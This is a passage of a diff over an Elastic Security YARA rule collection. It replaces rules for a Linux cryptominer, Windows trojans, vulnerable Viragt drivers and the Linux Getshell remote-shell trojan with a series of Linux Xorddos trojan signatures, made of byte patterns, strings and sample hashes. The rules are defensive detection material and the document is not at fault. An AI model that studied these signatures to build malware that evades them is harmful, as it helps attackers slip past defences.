"https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Xorddos.yar#L157-L175" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "494f549e3dd144e8bcb230dd7b3faa8ff5107d86d9548b21b619a0318e362cad" + logic_hash = "c2e43818fcf18d34a6a3611aaaafde31d96b41867d15dfdb1dec20203f5907eb" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e3486c785f99f4376d4161704afcaf61e8a5ab6101463a76d134469f8a5581bf" + fingerprint = "2c5688a82f7d39b0fceaf4458856549b1bce695a160a864f41b12b42e86e3745" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "\\\\?\\C:\\Windows\\System32\\winevt\\Logs" wide fullword - $a2 = "\\\\.\\EPMNTDRV\\%u" wide fullword - $a3 = "tdrv.pdb" ascii fullword - $a4 = "%s%.2s" wide fullword - $a5 = "ccessdri" ascii fullword - $a6 = "Hermetica Digital" + $a = { F4 87 5D F4 5B 9C 51 8B 4C 24 04 8D 49 2A 87 4C 24 04 89 4C } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Uwamson_C42Fd06D : FILE MEMORY +rule ELASTIC_Linux_Trojan_Xorddos_1D6E10Fd : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Uwamson (Linux.Cryptominer.Uwamson)" + description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" author = "Elastic Security" - id = "c42fd06d-b9ab-4f1f-bb59-e7b49355115c" - date = "2021-01-12" - modified = "2021-09-16" + id = "1d6e10fd-7404-4597-a97d-cc92849d84f4" + date = "2022-09-12" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Uwamson.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "8cfc38db2b860efcce5da40ce1e3992f467ab0b7491639d68d530b79529cda80" - logic_hash = "4ff7aad11adaae8fccb23d36fc96937ba48a5517895a742f2864ba1973f3db3a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Xorddos.yar#L177-L195" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4c7851316f01ae84ee64165be3ba910ab9b415d7f0e2f5b7e5c5a0eaefa3c287" + logic_hash = "01ec1af1ca03173e867113c3bec7911990a0c8c2d9f19b5233715a7f7490f5f1" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "dac171e66289e2222cd631d616f31829f31dfeeffb34f0e1dcdd687d294f117c" + fingerprint = "bf9d971a13983f1d0fdc8277e76cd1929523e239ce961316fe1f44cbdf0638a8" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -70712,28 +71009,28 @@ rule ELASTIC_Linux_Cryptominer_Uwamson_C42Fd06D : FILE MEMORY os = "linux" strings: - $a = { F0 4C 89 F3 48 8B 34 24 48 C1 E0 04 48 C1 E3 07 48 8B 7C 24 10 48 } + $a = { 24 04 9C 83 C5 7B 9D 8D 6D 85 87 54 24 00 9C 83 C5 26 9D 8D } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Uwamson_D08B1D2E : FILE MEMORY +rule ELASTIC_Linux_Trojan_Xorddos_E3Ffbbcc : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Uwamson (Linux.Cryptominer.Uwamson)" + description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" author = "Elastic Security" - id = "d08b1d2e-cbd5-420e-8f36-22b9efb5f12c" - date = "2021-01-12" - modified = "2021-09-16" + id = "e3ffbbcc-7751-4d96-abec-22dd9618cab1" + date = "2022-09-12" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Uwamson.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4f7ad24b53b8e255710e4080d55f797564aa8c270bf100129bdbe52a29906b78" - logic_hash = "8f489bb020397beae91f7bce82bc1b47912deab1b79224158f79c53f1d7c7fd3" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Xorddos.yar#L197-L215" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "28b7ddf2548411910af033b41982cdc74efd8a6ef059a54fda1b6cbd59faa8f6" + logic_hash = "54711c2d3e6d73cf4358ba4a65cb19d996adcfa905c0089a18a61fe841fe9a34" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "1e55dc81a44af9c15b7a803e72681b5c24030d34705219f83ca4779fd885098c" + fingerprint = "d5d5117a31da1a0ac3ef4043092eed47e2844938da9d03e2b68a66658e300175" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -70741,28 +71038,28 @@ rule ELASTIC_Linux_Cryptominer_Uwamson_D08B1D2E : FILE MEMORY os = "linux" strings: - $a = { 4F F8 49 8D 7D 18 89 D9 49 83 C5 20 48 89 FE 41 83 E1 0F 4D 0F } + $a = { FF 10 52 FB FF D0 52 FB FF 00 52 FB FF D0 52 FB FF F0 51 FB } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Uwamson_0797De34 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Xorddos_30F3B4D4 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Uwamson (Linux.Cryptominer.Uwamson)" + description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" author = "Elastic Security" - id = "0797de34-9181-4f28-a4b0-eafa67e20b41" - date = "2021-01-12" - modified = "2021-09-16" + id = "30f3b4d4-e634-418e-a9d5-7f12ef22f9ac" + date = "2022-09-12" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Uwamson.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e4699e35ce8091f97decbeebff63d7fa8c868172a79f9d9d52b6778c3faab8f2" - logic_hash = "7ab5dd99d8bbef61ec764900df5bebf39ed90833a8f9481c427cbb46faf2c521" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Xorddos.yar#L217-L235" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5b15d43d3535965ec9b84334cf9def0e8c3d064ffc022f6890320cd6045175bc" + logic_hash = "99efc257ff2afb779304451bd9f6f6ce9e88f54954189601ed10e95e2268dd4f" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "b6a210c23f09ffa0114f12aa741be50f234b8798a3275ac300aa17da29b8727c" + fingerprint = "de1002eb8e9aae984ee5fe2a6c1f91845dab4861e09e01d644248cff8c590e5b" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -70770,28 +71067,28 @@ rule ELASTIC_Linux_Cryptominer_Uwamson_0797De34 : FILE MEMORY os = "linux" strings: - $a = { 43 20 48 B9 AB AA AA AA AA AA AA AA 88 44 24 30 8B 43 24 89 44 } + $a = { 24 70 9C 83 C5 17 9D 8D 6D E9 0F 10 74 24 60 8B F6 0F 10 6C } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Uwamson_41E36585 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Xorddos_Ca75589C : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Uwamson (Linux.Cryptominer.Uwamson)" + description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" author = "Elastic Security" - id = "41e36585-0ef1-4896-a887-dac437c716a5" - date = "2021-01-12" - modified = "2021-09-16" + id = "ca75589c-6354-411b-b0a5-8400e657f956" + date = "2022-09-12" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Uwamson.yar#L61-L79" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "8cfc38db2b860efcce5da40ce1e3992f467ab0b7491639d68d530b79529cda80" - logic_hash = "e176523afe8c3394ddda41a5ef11f825fed1e149476709a7c1ea26b8af72d4fc" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Xorddos.yar#L237-L255" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0448c1b2c7c738404ba11ff4b38cdc8f865ccf1e202f6711345da53ce46e7e16" + logic_hash = "c717e6f85a5b30514803ba43c85d82e2aaa4533b7f74db5345df83d1cc4c6551" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "ad2d4a46b9378c09b1aef0f2bf67a990b3bacaba65a5b8c55c2edb0c9a63470d" + fingerprint = "0bcaeae9ec0f5de241a05c77aadb5c3f2e39c84d03236971a0640ebae528a496" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -70799,155 +71096,144 @@ rule ELASTIC_Linux_Cryptominer_Uwamson_41E36585 : FILE MEMORY os = "linux" strings: - $a = { F8 03 48 C1 FF 03 4F 8D 44 40 FD 48 0F AF FE 49 01 F8 4C 01 C2 4C } + $a = { 6D E0 25 01 00 00 00 55 8B EC C9 87 D1 87 0C 24 87 D1 8D 64 } condition: all of them } -rule ELASTIC_Windows_Trojan_Twistedtinsel_Aa56E527 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Xorddos_7909Cdd2 : FILE MEMORY { meta: - description = "Detects Windows Trojan Twistedtinsel (Windows.Trojan.TwistedTinsel)" + description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" author = "Elastic Security" - id = "aa56e527-df1a-4db7-ad89-187dff5e8745" - date = "2023-12-06" - modified = "2024-01-12" + id = "7909cdd2-8a49-4f51-ae16-1ffe321a29d4" + date = "2022-09-12" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_TwistedTinsel.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ef1cbdf9a23ae028a858e1d09529982eaeda61197ae029e091918690d3a86e2e" - logic_hash = "de31d0a5560baf6b37897eba3a637b00b539f542a2620983c3407a6898e003c7" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Xorddos.yar#L257-L275" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0a4a5874f43adbe71da88dc0ef124f1bf2f4e70d0b1b5461b2788587445f79d9" + logic_hash = "4b2557ab78d22ae4f46e5813ba5dc4663cd92b945a1add3155f77d3030ccc92d" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "e78a92c34ce7ab5545cd44930839551f72d8b19256d4f3280aad81358233f9eb" + fingerprint = "5c982596276c8587a88bd910bb2e75a7f72ea7a57c401ffa387aced33f9ac2b9" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 43 3A 5C 50 72 6F 67 72 61 6D 44 61 74 61 5C 4D 69 63 72 6F 73 6F 66 74 5C 45 64 67 65 55 70 64 61 74 65 5C 4C 6F 67 5C 63 68 75 61 6E 67 6B 6F 75 2E 6C 6F 67 } - $a2 = { 55 8B EC 83 EC 20 C7 45 EC 01 00 00 00 8B 45 08 8B 48 04 89 4D F4 8B 55 08 8B 02 B9 08 00 00 00 C1 E1 00 8D 54 08 78 89 55 E4 8B 45 E4 83 78 04 00 0F 86 81 01 00 00 8B 4D E4 8B 55 F4 03 11 89 } + $a = { A5 07 00 EC C5 19 08 EC C5 19 08 18 06 00 00 18 06 00 00 06 } condition: - any of them + all of them } -rule ELASTIC_Windows_Trojan_Mylobot_A895174A : FILE MEMORY +rule ELASTIC_Linux_Trojan_Xorddos_2522D611 : FILE MEMORY { meta: - description = "Detects Windows Trojan Mylobot (Windows.Trojan.MyloBot)" + description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" author = "Elastic Security" - id = "a895174a-0395-4ccb-b681-e8111a817a5c" - date = "2024-05-15" - modified = "2024-06-12" + id = "2522d611-4ce3-4583-87d6-e5631b62d562" + date = "2022-09-12" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_MyloBot.yar#L1-L25" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "33831d9ad64d0f52f507f08ef81607aafa6ced58a189969af6cf57c659c982d2" - logic_hash = "16f2d8eeb6c85944030a33bd250e4e8b98985a6c877a0ec3ad5a6037e7c00159" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Xorddos.yar#L277-L295" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0c2be53e298c285db8b028f563e97bf1cdced0c4564a34e740289b340db2aac1" + logic_hash = "59f2552809bc48e16719cb9b4d2a7b99999307803fce031ca39eb24e14b88908" score = 75 - quality = 50 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "dfa1e47260c0e07fea3b2b61157de71f412807b9eec19b14082da7d6a95d6099" + fingerprint = "985885a6b5f01e8816027f92148d2496a5535f3c15de151f05f69ec273291506" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "%s\\%s.lnk" wide fullword - $a2 = "%s\\%s.exe" wide fullword - $a3 = "%s\\%s\\%s.exe" wide fullword - $a4 = "HTTP/1.0 502" ascii fullword - $a5 = "/c \"%ws '%ws%s'\"" ascii fullword - $a6 = ">> %ws %ws %ws" ascii fullword - $a7 = "%s\\DefaultIcon" ascii fullword + $a = { 24 04 57 8B 7C 24 02 5F 87 44 24 00 50 8B 44 24 04 8D 40 42 87 44 } condition: all of them } -rule ELASTIC_Windows_Vulndriver_Viragt_5F92F226 : FILE +rule ELASTIC_Linux_Trojan_Xorddos_56Bd04D3 : FILE MEMORY { meta: - description = "Name: viragt.sys, Version: 1.80.0.0" + description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" author = "Elastic Security" - id = "5f92f226-053e-4a5b-8a0c-52a578f66cb8" - date = "2022-04-07" - modified = "2022-04-07" + id = "56bd04d3-6b52-43f4-b170-637feb86397a" + date = "2022-09-12" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_Viragt.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e05eeb2b8c18ad2cb2d1038c043d770a0d51b96b748bc34be3e7fc6f3790ce53" - logic_hash = "e7ade7aec563c1dc602dfd7fda8c063058f47ae2a915959468792fce389b38f1" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Xorddos.yar#L297-L315" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0d2ce3891851808fb36779a348a83bf4aa9de1a2b2684fd0692434682afac5ec" + logic_hash = "47a33fcd69dd78cbc6c3274aeaa8dddabe119ae65b59077e1807657b8a67fed3" score = 75 quality = 75 - tags = "FILE" - fingerprint = "544d7012478f31e9f9858ddb4463fa705bf8d50a97b5477557bd95e2d3d3b3ac" - threat_name = "Windows.VulnDriver.Viragt" - severity = 50 + tags = "FILE, MEMORY" + fingerprint = "25cd85e8e65362a993a314f2fc500266fce2f343d21a2e91b146dafbbe8186db" + severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 76 00 69 00 72 00 61 00 67 00 74 00 2E 00 73 00 79 00 73 00 00 00 } - $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x50][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x00][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x00][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x4f][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff]))/ + $a = { 5C 87 5C 24 04 89 5C 24 04 8B 1C 24 8D 64 24 04 8B 00 8B F6 87 } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version + all of them } -rule ELASTIC_Windows_Vulndriver_Viragt_84D508Ad : FILE +rule ELASTIC_Linux_Trojan_Xorddos_F412E4B4 : FILE MEMORY { meta: - description = "Name: viragt64.sys, Version: 1.0.0.11" + description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" author = "Elastic Security" - id = "84d508ad-939d-4e3b-b9a6-204eb8bcaee5" - date = "2022-04-07" - modified = "2022-04-07" + id = "f412e4b4-adec-4011-b4b5-f5bb77b65d84" + date = "2022-09-12" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_Viragt.yar#L23-L43" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495" - logic_hash = "a3e1b41155c7dd347976a1057cb763ab60c50c34e981fef050bd54f060a412fc" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Xorddos.yar#L317-L335" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0e3a3f7973f747fcb23c72289116659c7f158c604d937d6ca7302fbab71851e9" + logic_hash = "b4e1b193e80aa88b91255df3a5f2e45de7f23fdba4a28d3ceb12db63098e70e5" score = 75 quality = 75 - tags = "FILE" - fingerprint = "172be67b6bb07f189fd5e535e173d245114bf4b17c3daf89924a30c7219d3e69" - threat_name = "Windows.VulnDriver.Viragt" - severity = 50 + tags = "FILE, MEMORY" + fingerprint = "deb9f80d032c4b3c591935c474523fd6912d7bd2c4f498ec772991504720e683" + severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 76 00 69 00 72 00 61 00 67 00 74 00 36 00 34 00 2E 00 73 00 79 00 73 00 00 00 } - $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x00][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\x0b][\x00-\x00])([\x00-\x00][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x00][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff]))/ + $a = { 24 04 C1 E2 05 8B C0 03 C2 9C 83 C5 0F 9D 8D 6D F1 05 0C 00 } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version + all of them } -rule ELASTIC_Linux_Trojan_Getshell_98D002Bf : FILE MEMORY +rule ELASTIC_Linux_Trojan_Xorddos_71F8E26C : FILE MEMORY { meta: - description = "Detects Linux Trojan Getshell (Linux.Trojan.Getshell)" + description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" author = "Elastic Security" - id = "98d002bf-63b7-4d11-98ef-c3127e68d59c" - date = "2021-01-12" - modified = "2021-09-16" + id = "71f8e26c-d0ff-49e8-9c20-8df9149e8843" + date = "2022-09-12" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Getshell.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "97b7650ab083f7ba23417e6d5d9c1d133b9158e2c10427d1f1e50dfe6c0e7541" - logic_hash = "358575f55910b060bde94bbc55daa9650a43cf1470b77d1842ddcaa8b299700a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Xorddos.yar#L337-L355" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "13f873f83b84a0d38eb3437102f174f24a0ad3c5a53b83f0ee51c62c29fb1465" + logic_hash = "f9f2f22acd4f52cc313e3ecf425604651e0b8c78e33480d4d05bae5b8c9661fb" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "b7bfec0a3cfc05b87fefac6b10673491b611400edacf9519cbcc1a71842e9fa3" + fingerprint = "dbd1275bd01fb08342e60cb0c20adaf42971ed6ee0f679fedec9bc6967ecc015" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -70955,112 +71241,115 @@ rule ELASTIC_Linux_Trojan_Getshell_98D002Bf : FILE MEMORY os = "linux" strings: - $a = { B2 6A B0 03 CD 80 85 C0 78 02 FF E1 B8 01 00 00 00 BB 01 00 } + $a = { 24 8D 64 24 04 1B 07 87 DA 8B 5D F4 52 87 DA 5B 83 C2 03 52 8B 54 } condition: all of them } -rule ELASTIC_Linux_Trojan_Getshell_213D4D69 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Xorddos_1A562D3B : FILE MEMORY { meta: - description = "Detects Linux Trojan Getshell (Linux.Trojan.Getshell)" + description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" author = "Elastic Security" - id = "213d4d69-5660-468d-a98c-ff3eef604b1e" - date = "2021-06-28" - modified = "2021-09-16" - reference = "05fc4dcce9e9e1e627ebf051a190bd1f73bc83d876c78c6b3d86fc97b0dfd8e8" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Getshell.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "2075def88b31ac32e44c270ab20273c8b91f37e25a837c0353f76bcf431cdcb3" + id = "1a562d3b-bc59-4cb7-9ac1-7a4a79232869" + date = "2022-09-12" + modified = "2022-10-18" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Xorddos.yar#L357-L375" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "15731db615b32c49c34f41fe84944eeaf2fc79dafaaa9ad6bf1b07d26482f055" + logic_hash = "8d3b369bdcecd675f99cedf26dba202256555be0f5feae612404f9b5e109fa93" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "60e385e4c5eb189785bc14d39bf8a22c179e4be861ce3453fbcf4d367fc87c90" - severity = "100" + fingerprint = "e052e99f15f5a0f704c04cae412cf4b1f01a8ee6e4ce880aedc79cf5aee9631a" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a = { EC 01 00 00 00 EB 3C 8B 45 EC 48 98 48 C1 E0 03 48 03 45 D0 48 } + $a = { F0 87 1C 24 91 8D 64 24 FC 89 0C 24 8B C8 8B 04 24 87 D1 8D 64 } condition: all of them } -rule ELASTIC_Linux_Trojan_Getshell_3Cf5480B : FILE MEMORY +rule ELASTIC_Linux_Trojan_Xorddos_410256Ac : FILE MEMORY { meta: - description = "Detects Linux Trojan Getshell (Linux.Trojan.Getshell)" + description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" author = "Elastic Security" - id = "3cf5480b-bb21-4a6e-a078-4b145d22c79f" - date = "2021-06-28" - modified = "2021-09-16" - reference = "0e41c0d6286fb7cd3288892286548eaebf67c16f1a50a69924f39127eb73ff38" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Getshell.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "87b0db74e81d4f236b11f51a72fba2e4263c988402292b2182d19293858c6126" + id = "410256ac-fc7d-47f1-b7b8-82f1ee9f2bfb" + date = "2022-09-12" + modified = "2022-10-18" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Xorddos.yar#L377-L395" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "15f44e10ece90dec1a6104d5be1effefa17614d9f0cfb2784305dab85367b741" + logic_hash = "88227af6d2f365b761961bdf4b94bed81bca79e23d546e69900faa17c3e4dc71" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "3ef0817445c54994d5a6792ec0e6c93f8a51689030b368eb482f5ffab4761dd2" - severity = "100" + fingerprint = "aa7f1d915e55c3ef178565ed12668ddd71bf3e982dba1f2436c98cceef2c376d" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a = { B2 24 B0 03 CD 80 85 C0 78 02 FF E1 B8 01 00 00 00 BB 01 00 } + $a = { 24 04 87 CA 8B 4D 0C 52 87 CA 59 03 D1 55 8B EC C9 6A 08 F7 } condition: all of them } -rule ELASTIC_Linux_Trojan_Getshell_8A79B859 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Xorddos_93Fa87F1 : FILE MEMORY { meta: - description = "Detects Linux Trojan Getshell (Linux.Trojan.Getshell)" + description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" author = "Elastic Security" - id = "8a79b859-654c-4082-8cfc-61a143671457" - date = "2021-06-28" - modified = "2021-09-16" - reference = "1154ba394176730e51c7c7094ff3274e9f68aaa2ed323040a94e1c6f7fb976a2" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Getshell.yar#L61-L79" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "2aa3914ec4cc04e5daa2da1460410b4f0e5e7a37c5a2eae5a02ff5f55382f1fe" + id = "93fa87f1-ec9d-4b3b-9c9a-a0b80963f41f" + date = "2022-09-12" + modified = "2022-10-18" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Xorddos.yar#L397-L415" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "165b4a28fd6335d4e4dfefb6c40f41f16d8c7d9ab0941ccd23e36cda931f715e" + logic_hash = 